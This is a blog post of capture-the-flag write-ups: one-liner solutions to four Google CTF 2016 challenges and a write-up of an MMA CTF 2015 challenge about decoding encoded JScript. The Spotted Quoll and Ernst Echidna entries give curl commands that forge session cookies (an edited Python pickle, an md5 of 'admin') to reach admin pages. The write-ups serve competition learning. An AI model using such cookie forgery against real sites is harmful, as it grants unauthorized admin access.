Google CTF 2016 - Various [No Big Deal Pt. 1, In Recorded Conversation, Spotted Quoll, Ernst Echidna]

So I grouped these all together for two main reasons:

1. I was inspired seeing this short writeup for GeoKitties - https://twitter.com/k_firsov/status/726841516174508033
2. Write-ups can take some time, so this is a good way of shortening a few challenges into one post.

Quick note about the writeups below:

• Each of the examples below are one-liner solutions (they may not be the best one-liners because they can be longcat-long, but were fun to make)
• Each example below has a one-line output including the CTF{...} flag

No Big Deal Pt. 1 (50):

This one was probably one of the easiest challenges (even easier than the 5pt recon) that I came across, strings'ing the pcap gave an obvious base64 encoded value at the end of the dump, which turned into the flag, here's the one-liner:

strings -n 9 no-big-deal.pcap | tail -n 1 | base64 -D

Result:

CTF{betterfs.than.yours}

In Recorded Conversation (25):

The name of this challenge invoked the idea that there was going to be a hidden conversation to find a flag in.  That was exactly it in a pcap!  For this one I didn't open wireshark and decided to jump into more tshark.  This is not my actual solution for the challenge when I was playing (it was a lot more manual), but the same thing would've worked... Usually there's no time to do silly things like tr, sed & multi-massaged-list-comprehensions to get an answer when you're on the CTF clock.

tshark -r irc.pcap -T fields -e data 2>/dev/null | python -c "import sys; a=sys.stdin.read().split('\n'); a=[x.decode('hex') for x in a]; a=[x for x in a if 'PRIVMSG' in x and '~' not in x]; print a" | tr ',' '\n' | grep #ctf | tail -n 8 | head -n 7 | sed 's/.*://g;s/\\.*//g' | tr '\n' ' ' | sed 's/ //g'

Result:

CTF{some_leaks_are_good_leaks_}

Spotted Quoll (50):

This challenge was mainly solved by a team-mate (Unixist), but I helped out a bit with some minor details.  Also formed it into this massive one-liner:

curl -L https://spotted-quoll.ctfcompetition.com/admin --cookie obsoletePickle=$(python -c 'import pickle; x = pickle.loads("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu".decode("base64")); x["user"] = "admin"; print pickle.dumps(x).encode("base64").replace("\n", "")') 2>/dev/null | grep -i ctf

The challenge consisted of identifying that the cookie was in a python pickle format, dumping the current cookie (base64 encoded) and then noticing the user was set to None, changing it to admin and re-encoding it / sending it off.


Result:

Your flag is CTF{but_wait,theres_more.if_you_call} ... but is there more(1)? or less(1)?

Ernst Echidna (50):

This challenge was also a very simple web challenge, consisting of a cookie that was set to the md5 value of your username.  The goal was to view the admin section, so a little echo -n admin | md5sum, and we've got our cookie.

curl https://ernst-echidna.ctfcompetition.com/admin --cookie md5-hash=$(echo -n admin | md5) 2>/dev/null | grep -i ctf

Result:

      Congratulations, your token is 'CTF{renaming-a-bunch-of-levels-sure-is-annoying}

These were all simple, but very fun! Had a good time forming the (mostly) one-liners above today.  Let me know if you have any more efficient examples of these in the comments!

MMA CTF 2015 - MQAAAA (70)

MQAAAA was one of those obscure stego/misc challenges that began in a search for various Binary-to-text encodings (Wiki Page) that are publicly available out there.

Between a mix of intuitive feelings and tests of each encoding, and analysis of letter frequencies, I landed on the first being base64. This seemed too simple, but then looking at the result, I saw the title of the challenge in the obscure output: "MQAAAA"

Base64 Decode:

$ echo 'I0B+Xk1RQUFBQT09CVVtLmJ3RFIrMXRLY0p0SCkJRHRubTZWbFRtaEtETnxyZHtLNDZFZG1DT2JXVThyYmpSSUFBQT09XiN+QA==' | base64 -D

Output:

#@~^MQAAAA== Um.bwDR+1tKcJtH) Dtnm6VlTmhKDN|rd{K46EdmCObWU8rbjRIAAA==^#~@

Okay.... We've got some base64 lookin' stuff... some non base64 lookin' stuff... lots of space, and MQAAAA== decodes to 1. Great.

After being stumped for a while, I went on an assumption that this is another type of encoding or language out there somewhere.
Noticed that the start and end of this result was #@~^ and ^#~@... After looking at php for hours, having the image of deepen it's way into my retinas, I had the thought of pre / post tokens for languages burnt into my current thoughts. So let's search for one.

On SymbolHound (Great site for searching symboles) - I looked for the beginning segment: #@~^

The only Result:

It's IT | softwareontwikkeling, webdevelopment, ict oplossingen op maat
#@~^FQAAAA==@#@&CCb@#@&zz O@*@#@&TQIAAA==^#~@ HaiHai HaiHai #@~^IgAAAA==@#@&CCbCmk@#@&CmrCmk@#@&JzRR@*@#@&mgUAAA==^#~@ Cute. As you can see, @#@& appears to be a newline (@#
http://itsit.nl/klaphek/scrdec.html

This leads to a post entitled: "Breaking the Windows Script Encoder"
The code we're looking at after the Base64 decoding is JSCript. A funky version of ECMAScript used in windows (originally for ActiveX).

I did not read the article the search resulted in. Instead after looking on wikipedia for JScript I found a mention to the numerous online decryption services for JScript. After some searches I didn't find one hosted online, but did find a C script hosted on a site that was currently down, but available on the WaybackMachine - link.

And the C file which encodes & decodes JScript files: http://web.archive.org/web/20140209124110/http://www.virtualconspiracy.com/download/scrdec18.c


After compiling and running that against a new file containing the output of the base64 decoding, we get the flag:

WScript.echo("MMA{the_flag_word_is_obfuscation}")